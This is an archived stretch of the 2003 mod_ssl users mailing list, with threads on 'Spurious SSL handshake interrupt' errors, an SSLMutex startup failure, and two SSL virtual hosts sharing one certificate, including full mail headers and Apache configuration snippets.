Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan  6 19:23:39 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 226612AA0B8; Mon,  6 Jan 2003 19:23:39 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from iggy.fringehead.org (iggy.fringehead.org [209.151.228.210])
	by master.modssl.org (Postfix) with SMTP id 26D472AA09E
	for ; Mon,  6 Jan 2003 19:22:16 +0100 (CET)
Received: (qmail 2862 invoked from network); 6 Jan 2003 18:22:14 -0000
Received: from pip.office.fringehead.org (192.168.100.7)
  by iggy.fringehead.org with SMTP; 6 Jan 2003 18:22:14 -0000
Received: (qmail 5057 invoked by uid 1000); 6 Jan 2003 18:22:13 -0000
From: "Conrad Heiney" 
Date: Mon, 6 Jan 2003 10:22:13 -0800
To: modssl-users@modssl.org
Subject: Re: Spurious SSL handshake interrupt
Message-ID: <20030106182213.GA5015@localhost.localdomain>
References: 
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="gBBFr7Ir9EOA20Yy"
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
X-PGP-Fingerprint: F423 F924 7041 97A9 51C3  99FB C959 BA56 445F FDD4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Conrad Heiney" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--gBBFr7Ir9EOA20Yy
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

I receive this log message constantly myself, although it has no
apparent impact on performance in my case. The reason for it in our
installation is that the load balancer is set to check SSL availability
and is frequently requesting data from the SSL server but without a full
connection.

Hope this is helpful.

conrad

On Mon, Jan 06, 2003 at 01:15:07PM -0500, Raj Mettai wrote:
> Hi All,
> =20
> I am running apache 2.0.39 with mod_ssl module on solaris 8. connected to
> tomcat 4.1.12. I am getting lot of " Spurious SSL handshake interrupt"
> errors in ssl_error.log file. All my https calls have become drastically =
slow.
> Any clues on this error please, it's a production website...
> =20
> [Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt [Hint:
> Usually just one of those OpenSSL confusions!?]

--=20
Conrad Heiney
conrad@fringehead.org
http://fringehead.org
----------

If the Catholics can no longer transsubstantiate onion dip into the body of=
 Christ, I'd say it is a pretty crappy miracle. --mjd

--gBBFr7Ir9EOA20Yy
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+GclVyVm6VkRf/dQRAmm7AJ47me6/S0ry7PYkK+kCt13lX3N9FACfTdZm
TXhSFY63tQ9i//9vC8VqAJw=
=rLdS
-----END PGP SIGNATURE-----

--gBBFr7Ir9EOA20Yy--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan  6 19:46:29 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4F3CF2AA0B8; Mon,  6 Jan 2003 19:46:29 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from gw.broward.edu (gw.broward.edu [169.139.60.44])
	by master.modssl.org (Postfix) with ESMTP id 6FBD52AA09E
	for ; Mon,  6 Jan 2003 19:45:33 +0100 (CET)
Received: from Primary-MTA by gw.broward.edu
	with Novell_GroupWise; Mon, 06 Jan 2003 13:45:32 -0500
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Mon, 06 Jan 2003 13:44:54 -0500
From: "Raj Mettai" 
To: 
Subject: Re: Spurious SSL handshake interrupt
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary="=_5D0277DC.43225F31"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Raj Mettai" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

--=_5D0277DC.43225F31
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit

thanks a lot conrad....I am also seeing following errors in the logs 

[Mon Jan 06 13:10:17 2003] [error] SSL handshake failed (server
new.host.name:443, client 12.94.6.64)
[Mon Jan 06 13:10:17 2003] [error] SSL Library Error: 336151574
error:14094416:lib(20):func(148):reason(1046)

are the above errors are also very common or do they mean something...

thanks in advance

-Raj


>>> conrad@fringehead.org 01/06/03 01:22PM >>>
I receive this log message constantly myself, although it has no
apparent impact on performance in my case. The reason for it in our
installation is that the load balancer is set to check SSL availability
and is frequently requesting data from the SSL server but without a full
connection.

Hope this is helpful.

conrad

On Mon, Jan 06, 2003 at 01:15:07PM -0500, Raj Mettai wrote:
> Hi All,
>  
> I am running apache 2.0.39 with mod_ssl module on solaris 8. connected
to
> tomcat 4.1.12. I am getting lot of " Spurious SSL handshake interrupt"
> errors in ssl_error.log file. All my https calls have become
drastically slow.
> Any clues on this error please, it's a production website...
>  
> [Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt
[Hint:
> Usually just one of those OpenSSL confusions!?]

-- 
Conrad Heiney
conrad@fringehead.org
http://fringehead.org
----------

If the Catholics can no longer transsubstantiate onion dip into the body
of Christ, I'd say it is a pretty crappy miracle. --mjd

--=_5D0277DC.43225F31
Content-Type: text/html; charset=ISO-8859-1
Content-Transfer-Encoding: 8bit







thanks a lot conrad....I am also seeing following errors in the logs 


 


[Mon Jan 06 13:10:17 2003] [error] SSL handshake failed 
(server
new.host.name:443, client 12.94.6.64)
[Mon Jan 06 13:10:17 2003] 
[error] SSL Library Error: 
336151574
error:14094416:lib(20):func(148):reason(1046)

are the above 
errors are also very common or do they mean something...


 


thanks in advance


 


-Raj


>>> conrad@fringehead.org 01/06/03 01:22PM 
>>>
I receive this log message constantly myself, although it has 
no
apparent impact on performance in my case. The reason for it in 
our
installation is that the load balancer is set to check SSL 
availability
and is frequently requesting data from the SSL server but 
without a full
connection.

Hope this is 
helpful.

conrad

On Mon, Jan 06, 2003 at 01:15:07PM -0500, Raj 
Mettai wrote:
> Hi All,

> I am running apache 2.0.39 
with mod_ssl module on solaris 8. connected to
> tomcat 4.1.12. I am 
getting lot of " Spurious SSL handshake interrupt"
> errors in 
ssl_error.log file. All my https calls have become drastically slow.
> Any 
clues on this error please, it's a production website...

> 
[Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt 
[Hint:
> Usually just one of those OpenSSL confusions!?]

-- 

Conrad Heiney
conrad@fringehead.org
http://fringehead.org
----------

If 
the Catholics can no longer transsubstantiate onion dip into the body of Christ, 
I'd say it is a pretty crappy miracle. --mjd


--=_5D0277DC.43225F31--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan  6 19:55:00 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 0270B2AA0B8; Mon,  6 Jan 2003 19:54:59 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from iggy.fringehead.org (iggy.fringehead.org [209.151.228.210])
	by master.modssl.org (Postfix) with SMTP id 5DB1F2AA0B7
	for ; Mon,  6 Jan 2003 19:53:32 +0100 (CET)
Received: (qmail 3304 invoked from network); 6 Jan 2003 18:53:31 -0000
Received: from pip.office.fringehead.org (192.168.100.7)
  by iggy.fringehead.org with SMTP; 6 Jan 2003 18:53:31 -0000
Received: (qmail 5195 invoked by uid 1000); 6 Jan 2003 18:53:30 -0000
From: "Conrad Heiney" 
Date: Mon, 6 Jan 2003 10:53:30 -0800
To: modssl-users@modssl.org
Subject: Re: Spurious SSL handshake interrupt
Message-ID: <20030106185330.GA5160@localhost.localdomain>
References: 
Mime-Version: 1.0
Content-Type: multipart/signed; micalg=pgp-sha1;
	protocol="application/pgp-signature"; boundary="gKMricLos+KVdGMg"
Content-Disposition: inline
In-Reply-To: 
User-Agent: Mutt/1.4i
X-PGP-Fingerprint: F423 F924 7041 97A9 51C3  99FB C959 BA56 445F FDD4
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Conrad Heiney" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--gKMricLos+KVdGMg
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
Content-Transfer-Encoding: quoted-printable

No idea there, sorry; someone smarter than me must be called in. ;)

On Mon, Jan 06, 2003 at 01:44:54PM -0500, Raj Mettai wrote:
> thanks a lot conrad....I am also seeing following errors in the logs
> =20
> [Mon Jan 06 13:10:17 2003] [error] SSL handshake failed (server
> new.host.name:443, client 12.94.6.64)
> [Mon Jan 06 13:10:17 2003] [error] SSL Library Error: 336151574
> error:14094416:lib(20):func(148):reason(1046)
>=20
> are the above errors are also very common or do they mean something...
> =20
> thanks in advance
> =20
> -Raj
>=20
>=20
--=20
Conrad Heiney
conrad@fringehead.org
http://fringehead.org
----------

 Orthaganal az I wanna bee!|

--gKMricLos+KVdGMg
Content-Type: application/pgp-signature
Content-Disposition: inline

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (GNU/Linux)

iD8DBQE+GdCqyVm6VkRf/dQRAq0vAKCoLh819eIWuh3FRFa03YRfEuTIuQCfYUY2
VuDUDLdh34qp/2YzlspxlqI=
=DpLJ
-----END PGP SIGNATURE-----

--gKMricLos+KVdGMg--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Jan  6 20:38:56 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3FB5F2AA0B9; Mon,  6 Jan 2003 20:38:56 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from bistromath.cs.virginia.edu (chrvlle-cad1-bdgrp5-8b-b-3.chvlva.adelphia.net [68.71.229.3])
	by master.modssl.org (Postfix) with ESMTP id 9304A2AA09E
	for ; Mon,  6 Jan 2003 20:37:55 +0100 (CET)
Received: from localhost (root@localhost)
	by bistromath.cs.virginia.edu (8.12.4/8.11.4) with ESMTP id h06Jb9t5000538
	for ; Mon, 6 Jan 2003 14:37:10 -0500
Date: Mon, 6 Jan 2003 14:37:09 -0500 (EST)
From: Cliff Woolley 
X-X-Sender: root@bistromath.cs.virginia.edu
To: modssl-users@modssl.org
Subject: Re: Spurious SSL handshake interrupt
In-Reply-To: 
Message-ID: 
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cliff Woolley 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Mon, 6 Jan 2003, Raj Mettai wrote:

> I am running apache 2.0.39 with mod_ssl module on solaris 8. connected
> to tomcat 4.1.12. I am getting lot of " Spurious SSL handshake
> interrupt" errors in ssl_error.log file. All my https calls have become
> drastically slow. Any clues on this error please, it's a production
> website...
> [Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt
> [Hint: Usually just one of those OpenSSL confusions!?]

I don't remember for sure because it's been a while, but I want to say
that something related to this message was fixed in mod_ssl after 2.0.39
was released.  2.0.44 should be coming out sometime soon... give that one
a try when it's released and let me know if you still see the problem.

--Cliff

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan  7 18:25:31 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 51F382AA088; Tue,  7 Jan 2003 18:25:31 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from capa.visilinx.com (webmail.visilinx.com [66.226.194.12])
	by master.modssl.org (Postfix) with ESMTP id 5681E2AA078
	for ; Tue,  7 Jan 2003 18:24:04 +0100 (CET)
Received: from localhost (openmail@localhost)
	by capa.visilinx.com (8.11.6/8.11.6) with ESMTP id h07HFIZ32708;
	Tue, 7 Jan 2003 11:15:18 -0600
X-OpenMail-Hops: 1
Date: Tue, 7 Jan 2003 11:15:17 -0600
Message-Id: 
Subject: RE: httpd won't start
MIME-Version: 1.0
From: jgu@visilinx.com (Jenny Gu)
To: John.Airey@rnib.org.uk, modssl-users@modssl.org
Content-Type: text/plain; charset=US-ASCII
Content-Disposition: inline
	;Creation-Date="Tue, 7 Jan 2003 11:15:17 -0600"
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jgu@visilinx.com (Jenny Gu)
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Thank you for your response. The system is using Red Hat 8.0. The 
httpd.conf is the default. I am still trying to find the missing 
something in the build of the kernel.

Thank you,

Jenny

-----Original Message-----
From: John.Airey [mailto:John.Airey@rnib.org.uk]
Sent: Monday, January 06, 2003 3:17 AM
To: modssl-users
Subject: RE: httpd won't start


I doubt that missing something in the build of the kernel would prevent 
a
file from being created. Some more information would be useful.

When you say linux, do you mean Red Hat? How exactly are you attempting 
to
start it? What user and group are you starting the server as?

A copy of your httpd.conf configuration file (with any data you don't 
want
made public removed) would be most useful.

- 
John Airey, BSc (Jt Hons), CNA, RHCE
Internet systems support officer, ITCSD, Royal National Institute of the
Blind,
Bakewell Road, Peterborough PE2 6XU,
Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 
John.Airey@rnib.org.uk 

"I know it sounds cocky, but I honestly believe that one day there'll be 
a
telephone in every Town in America" - Alexander Graham Bell (my 
paraphrase)


> -----Original Message-----
> From: jgu@visilinx.com [mailto:jgu@visilinx.com]
> Sent: 03 January 2003 18:19
> To: modssl-users@modssl.org
> Subject: httpd won't start
> 
> 
> Hi all,
> 
> I can't start httpd on linux kernel 2.4.20 which I compiled. 
> The error 
> message is:
> 	[Fri Jan 03 11:11:18 2003] 
> 	[error] (38)Function not implemented: 
> 	Cannot create SSLMutex file `/var/log/httpd/ssl_mutex.575'
> 	Configuration Failed
> 
> I have checked all file and directory privileges. It seems no 
> problems. 
> I guess that I am missing build components while building the linux 
> kernel. Has someone gone through this and tell me which 
> components I am 
> missing or have a suggestion?
> 
> FYI, httpd starts fine under Red Hat 8.0 with kernel 2.4.18
> 
> Thank you,
> 
> Jenny Gu
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 

- 

NOTICE: The information contained in this email and any attachments is 
confidential and may be legally privileged. If you are not the 
intended recipient you are hereby notified that you must not use, 
disclose, distribute, copy, print or rely on this email's content. If 
you are not the intended recipient, please notify the sender 
immediately and then delete the email and any attachments from your 
system.

RNIB has made strenuous efforts to ensure that emails and any 
attachments generated by its staff are free from viruses. However, it 
cannot accept any responsibility for any viruses which are 
transmitted. We therefore recommend you scan all attachments.

Please note that the statements and views expressed in this email 
and any attachments are those of the author and do not necessarily 
represent those of RNIB.

RNIB Registered Charity Number: 226227

Website: http://www.rnib.org.uk 
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jan  7 20:21:25 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id EECFE2AA099; Tue,  7 Jan 2003 20:21:24 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from atlrel7.hp.com (atlrel7.hp.com [156.153.255.213])
	by master.modssl.org (Postfix) with ESMTP id 9472A2AA088
	for ; Tue,  7 Jan 2003 20:19:57 +0100 (CET)
Received: from xatlrelay1.atl.hp.com (xatlrelay1.atl.hp.com [15.45.89.190])
	by atlrel7.hp.com (Postfix) with ESMTP id 64B07805F65
	for ; Tue,  7 Jan 2003 14:19:56 -0500 (EST)
Received: from xatlbh2.atl.hp.com (xatlbh2.atl.hp.com [15.45.89.187])
	by xatlrelay1.atl.hp.com (Postfix) with ESMTP id 3C0B61C009EA
	for ; Tue,  7 Jan 2003 14:19:56 -0500 (EST)
Received: by xatlbh2.atl.hp.com with Internet Mail Service (5.5.2655.55)
	id ; Tue, 7 Jan 2003 14:19:56 -0500
Message-ID: 
From: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" 
To: "'modssl-users@modssl.org'" 
Subject: RE: Spurious SSL handshake interrupt
Date: Tue, 7 Jan 2003 14:19:46 -0500 
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2655.55)
Content-Type: text/plain;
	charset="iso-8859-1"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "MATHIHALLI,MADHUSUDAN (HP-Cupertino,ex1)" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

http://marc.theaimsgroup.com/?l=apache-httpd-dev&m=103067052915603&w=2

-Madhu

>-----Original Message-----
>From: Cliff Woolley [mailto:jwoolley@apache.org]
>Sent: Monday, January 06, 2003 11:37 AM
>To: modssl-users@modssl.org
>Subject: Re: Spurious SSL handshake interrupt
>
>
>On Mon, 6 Jan 2003, Raj Mettai wrote:
>
>> I am running apache 2.0.39 with mod_ssl module on solaris 8. 
>connected
>> to tomcat 4.1.12. I am getting lot of " Spurious SSL handshake
>> interrupt" errors in ssl_error.log file. All my https calls 
>have become
>> drastically slow. Any clues on this error please, it's a production
>> website...
>> [Mon Jan 06 13:09:36 2003] [error] Spurious SSL handshake interrupt
>> [Hint: Usually just one of those OpenSSL confusions!?]
>
>I don't remember for sure because it's been a while, but I want to say
>that something related to this message was fixed in mod_ssl 
>after 2.0.39
>was released.  2.0.44 should be coming out sometime soon... 
>give that one
>a try when it's released and let me know if you still see the problem.
>
>--Cliff
>
>______________________________________________________________________
>Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
>User Support Mailing List                      modssl-users@modssl.org
>Automated List Manager                            majordomo@modssl.org
>
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan  8 19:58:17 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 3D64D2AA09F; Wed,  8 Jan 2003 19:58:17 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.gmx.net (pop.gmx.de [213.165.65.60])
	by master.modssl.org (Postfix) with SMTP id 31C922AA083
	for ; Wed,  8 Jan 2003 19:58:16 +0100 (CET)
Received: (qmail 22517 invoked by uid 0); 8 Jan 2003 18:58:13 -0000
Received: from dclient217-162-160-61.hispeed.ch (HELO andy) (217.162.160.61)
  by mail.gmx.net (mp005-rz3) with SMTP; 8 Jan 2003 18:58:13 -0000
From: "toxshark" 
To: 
Subject: 2 VirtualHosts with 2 Certificates 
Date: Wed, 8 Jan 2003 19:58:10 +0100
Message-ID: <000701c2b747$e3a975d0$3da0a2d9@andy>
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_0008_01C2B750.456DDDD0"
X-Priority: 3 (Normal)
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook, Build 10.0.2616
Importance: Normal
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "toxshark" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_0008_01C2B750.456DDDD0
Content-Type: text/plain;
	charset="us-ascii"
Content-Transfer-Encoding: 7bit

i have the apache configured with 2 VirtualHosts on port 443.
both VirtualServers have separately CertificateFiles and
CertificateKeyFiles.
but now if i connect to the VirtualHost2, the Host have the Certificate
from the VirtualServer1!
both Hosts have now the same Certificate.
 
my httpd.config: 
 
... 
NameVirtualHost 92.35.28.17:443 
 
 
ServerName domain1.com 
ServerAlias www.domain1.com 
DocumentRoot "/web1/" 
SSLEngine on 
SSLCertificateFile /usr/local/etc/apache/key/ssl1.cert 
SSLCertificateKeyFile /usr/local/etc/apache/key/ssl1.key 
 
 
 
ServerName domain2.com 
ServerAlias www.domain2.com 
DocumentRoot "/web2/" 
SSLEngine on 
SSLCertificateFile /usr/local/etc/apache/key/ssl2.cert 
SSLCertificateKeyFile /usr/local/etc/apache/key/ssl2.key 

... 
 

------=_NextPart_000_0008_01C2B750.456DDDD0
Content-Type: text/html;
	charset="us-ascii"
Content-Transfer-Encoding: quoted-printable






















i have the apache configured with 2 VirtualHosts
on port 443.



both VirtualServers
have separately CertificateFiles and CertificateKeyFiles.



but now if i
connect to the VirtualHost2, the Host have the Certificate from the
VirtualServer1!



both Hosts have now the same =
Certificate.



 



my httpd.config:




 



... 



NameVirtualHost 92.35.28.17:443 =




 



<VirtualHost
92.35.28.17:443> 



ServerName domain1.com =




ServerAlias www.domain1.com 



DocumentRoot "/web1/" =




SSLEngine on 



SSLCertificateFile =
/usr/local/etc/apache/key/ssl1.cert 



SSLCertificateKeyFile<=
font
size=3D2 face=3D"Courier New"> =
/usr/local/etc/apache/key/ssl1.key 



</VirtualHost>




 



<VirtualHost
92.35.28.17:443> 



ServerName domain2.com =




ServerAlias www.domain2.com 



DocumentRoot "/web2/" =




SSLEngine on 



SSLCertificateFile =
/usr/local/etc/apache/key/ssl2.cert 



SSLCertificateKeyFile<=
font
size=3D2 face=3D"Courier New"> =
/usr/local/etc/apache/key/ssl2.key 



</VirtualHost>



...




 









------=_NextPart_000_0008_01C2B750.456DDDD0--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan  8 20:29:02 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 4BAB72AA09F; Wed,  8 Jan 2003 20:29:02 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from toftum.dk (toftum.dk [193.88.12.46])
	by master.modssl.org (Postfix) with ESMTP id 131512AA083
	for ; Wed,  8 Jan 2003 20:29:01 +0100 (CET)
Received: by toftum.dk (Postfix, from userid 1001)
	id 54A3D6E40B4; Wed,  8 Jan 2003 20:28:58 +0100 (CET)
Date: Wed, 8 Jan 2003 20:28:58 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: 2 VirtualHosts with 2 Certificates
Message-ID: <20030108192858.GA26279@toftum.dk>
Mail-Followup-To: modssl-users@modssl.org
References: <000701c2b747$e3a975d0$3da0a2d9@andy>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <000701c2b747$e3a975d0$3da0a2d9@andy>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Wed, Jan 08, 2003 at 07:58:10PM +0100, toxshark wrote:
> i have the apache configured with 2 VirtualHosts on port 443.
> both VirtualServers have separately CertificateFiles and
> CertificateKeyFiles.
> but now if i connect to the VirtualHost2, the Host have the Certificate
> from the VirtualServer1!
> both Hosts have now the same Certificate.
>  
A classical FAQ - http://www.modssl.org/docs/2.8/ssl_faq.html#vhosts
you need different ip's or different ports.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan  8 21:00:50 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 6FFF72AA09F; Wed,  8 Jan 2003 21:00:50 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from mail.databuilt.com (f12-1-3-00-0899.beready.att.net [63.241.179.71])
	by master.modssl.org (Postfix) with ESMTP id 3FFA62AA083
	for ; Wed,  8 Jan 2003 21:00:44 +0100 (CET)
Received: from hh-nts01.databuilt.com ([12.111.128.215])
	by mail.databuilt.com (8.10.2/8.10.2) with ESMTP id h08K0Vb04935
	for ; Wed, 8 Jan 2003 15:00:37 -0500
Received: from hh-nts01.databuilt.com ([192.168.1.9]) by hh-nts01.databuilt.com with Microsoft SMTPSVC(5.0.2195.5329);
	 Wed, 8 Jan 2003 15:00:34 -0500
Received: FROM w3works.com BY hh-nts01.databuilt.com ; Wed Jan 08 15:00:33 2003 -0500
Date: Wed, 8 Jan 2003 15:00:38 -0500
Subject: Re: 2 VirtualHosts with 2 Certificates 
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Mime-Version: 1.0 (Apple Message framework v551)
From: Dave Paris 
To: modssl-users@modssl.org
Content-Transfer-Encoding: quoted-printable
In-Reply-To: <000701c2b747$e3a975d0$3da0a2d9@andy>
Message-Id: 
X-Mailer: Apple Mail (2.551)
X-OriginalArrivalTime: 08 Jan 2003 20:00:34.0562 (UTC) FILETIME=[9B015E20:01C2B750]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave Paris 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Per all the documentation and countless examples in the archives of=20
this mail list, you must either use two different IPs or use different=20=

ports.  You *cannot* used Named Virtual Hosts for SSL.  Period.

-dsp

On Wednesday, Jan 8, 2003, at 13:58 US/Eastern, toxshark wrote:

> ihave the apache configured with 2 VirtualHosts on port 443.
>
> bothVirtualServers have separately CertificateFiles and=20
> CertificateKeyFiles.
>
> butnow if i connect to the VirtualHost2, the Host have the Certificate=20=

> from the VirtualServer1!
>
> bothHosts have now the same Certificate.
>
> =A0
>
> myhttpd.config:
>
> =A0
>
> ...
>
> NameVirtualHost92.35.28.17:443
>
> =A0
>
> 
>
> ServerNamedomain1.com
>
> ServerAliaswww.domain1.com
>
> DocumentRoot"/web1/"
>
> SSLEngineon
>
> SSLCertificateFile/usr/local/etc/apache/key/ssl1.cert
>
> SSLCertificateKeyFile/usr/local/etc/apache/key/ssl1.key
>
> 
>
> =A0
>
> 
>
> ServerNamedomain2.com
>
> ServerAliaswww.domain2.com
>
> DocumentRoot"/web2/"
>
> SSLEngineon
>
> SSLCertificateFile/usr/local/etc/apache/key/ssl2.cert
>
> SSLCertificateKeyFile/usr/local/etc/apache/key/ssl2.key
>
> 
>
> ...
>
> =A0
>

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Jan  8 22:28:54 2003
Return-Path: 
Delivered-To: modssl-users-l@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id D6D002AA09F; Wed,  8 Jan 2003 22:28:54 +0100 (CET)
Delivered-To: modssl-users@modssl.org
Received: from blount.mail.mindspring.net (blount.mail.mindspring.net [207.69.200.226])
	by master.modssl.org (Postfix) with ESMTP id 4D2832AA083
	for ; Wed,  8 Jan 2003 22:28:53 +0100 (CET)
Received: from user-119a2lq.biz.mindspring.com ([66.149.10.186] helo=amadeus.basicsllp.com)
	by blount.mail.mindspring.net with esmtp (Exim 3.33 #1)
	id 18WNkk-0005ER-00
	for modssl-users@modssl.org; Wed, 08 Jan 2003 16:28:46 -0500
Received: from basicsllp.com ([10.0.3.20])
	(authenticated bits=0)
	by amadeus.basicsllp.com (8.12.5/8.12.5) with ESMTP id h08LSk4p000578
	for ; Wed, 8 Jan 2003 16:28:46 -0500
Message-ID: <3E1C984B.2020802@basicsllp.com>
Date: Thu, 09 Jan 2003 05:29:47 +0800
From: James Barwick 
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US; rv:1.3a) Gecko/20021212
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: 2 VirtualHosts with 2 Certificates
References: <000701c2b747$e3a975d0$3da0a2d9@andy>
In-Reply-To: <000701c2b747$e3a975d0$3da0a2d9@andy>
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: James Barwick 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Should have read the MOST FREQUENTLY ASKED FREQUENTLY ASKED QUESTIONS!!!

Can't do that.  Learn a little more about SSL.  It's IP based, not name 
based.  So, you can only have
one certificate and one firtual host on 92.35.28.17:443.  Sorry...but 
